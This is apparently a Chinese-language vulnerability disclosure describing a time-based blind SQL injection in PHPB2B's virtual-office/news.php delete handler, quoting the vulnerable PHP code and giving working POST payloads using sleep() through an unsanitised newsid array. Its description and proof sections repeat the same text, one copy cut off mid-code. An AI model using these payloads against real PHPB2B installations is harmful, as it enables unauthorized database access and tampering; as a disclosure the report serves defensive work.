### 简要描述: PHPB2B某处sql注入#4 ### 详细说明: PHPB2B某处sql注入 官网下载的最新版本 virtual-office/news.php 73-80行 ``` if (isset($_POST['del'])) { $result = $companynews->del($_POST['newsid'], $conditions); if ($result) { flash("success"); }else { flash("action_failed"); } } ``` post的数据传入del函数,跟入看看。 ``` function del($ids, $conditions = null, $table = null) { $del_id = $this->primaryKey; $tmp_ids = $condition = null; if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } if (!empty($table)) { $table_name = $this->table_prefix.$table; }else{ $table_name = $this->getTable(); } if(!empty($conditions)) { if(is_array($conditions)) { $tmp_where_cond = implode(" AND ", $conditions); $cond[] = $tmp_where_cond; } else { $cond[] = $conditions; } } $this->setCondition($cond); $sql = "DELETE FROM ".$table_name.$this->getCondition(); $deleted = $this->dbstuff->Execute($sql);...
### 简要描述: PHPB2B某处sql注入#4 ### 详细说明: PHPB2B某处sql注入 官网下载的最新版本 virtual-office/news.php 73-80行 ``` if (isset($_POST['del'])) { $result = $companynews->del($_POST['newsid'], $conditions); if ($result) { flash("success"); }else { flash("action_failed"); } } ``` post的数据传入del函数,跟入看看。 ``` function del($ids, $conditions = null, $table = null) { $del_id = $this->primaryKey; $tmp_ids = $condition = null; if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } if (!empty($table)) { $table_name = $this->table_prefix.$table; }else{ $table_name = $this->getTable(); } if(!empty($conditions)) { if(is_array($conditions)) { $tmp_where_cond = implode(" AND ", $conditions); $cond[] = $tmp_where_cond; } else { $cond[] = $conditions; } } $this->setCondition($cond); $sql = "DELETE FROM ".$table_name.$this->getCondition(); $deleted = $this->dbstuff->Execute($sql); unset($this->condition); return $deleted; } ``` 关键在这一句 if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } 如果传入的ids是个数组的话,就没有intval强制类型转换了,并且两边没有用单引号括起来。于是这里出现了注入,无视GPC。 因为是delete型,时间盲注。 演示。 POST提交url localhost/phpb2b/virtual-office/news.php 提交内容 del=1&newsid[]=1123,123)||if(1=1,sleep(3),0)%23 成功延时 del=1&newsid[]=1123,123)||if(1=2,sleep(3),0)%23 不延时 PS:工作人员在测试时,一定记得先加上一条新闻,确保表中有数据 ### 漏洞证明: PHPB2B某处sql注入 官网下载的最新版本 virtual-office/news.php 73-80行 ``` if (isset($_POST['del'])) { $result = $companynews->del($_POST['newsid'], $conditions); if ($result) { flash("success"); }else { flash("action_failed"); } } ``` post的数据传入del函数,跟入看看。 ``` function del($ids, $conditions = null, $table = null) { $del_id = $this->primaryKey; $tmp_ids = $condition = null; if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } if (!empty($table)) { $table_name = $this->table_prefix.$table; }else{ $table_name = $this->getTable(); } if(!empty($conditions)) { if(is_array($conditions)) { $tmp_where_cond = implode(" AND ", $conditions); $cond[] = $tmp_where_cond; } else { $cond[] = $conditions; } } $this->setCondition($cond); $sql = "DELETE FROM ".$table_name.$this->getCondition(); $deleted = $this->dbstuff->Execute($sql); unset($this->condition); return $deleted; } ``` 关键在这一句 if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } 如果传入的ids是个数组的话,就没有intval强制类型转换了,并且两边没有用单引号括起来。于是这里出现了注入,无视GPC。 因为是delete型,时间盲注。 演示。 POST提交url localhost/phpb2b/virtual-office/news.php 提交内容 del=1&newsid[]=1123,123)||if(1=1,sleep(3),0)%23 成功延时 del=1&newsid[]=1123,123)||if(1=2,sleep(3),0)%23 不延时 PS:工作人员在测试时,一定记得先加上一条新闻,确保表中有数据
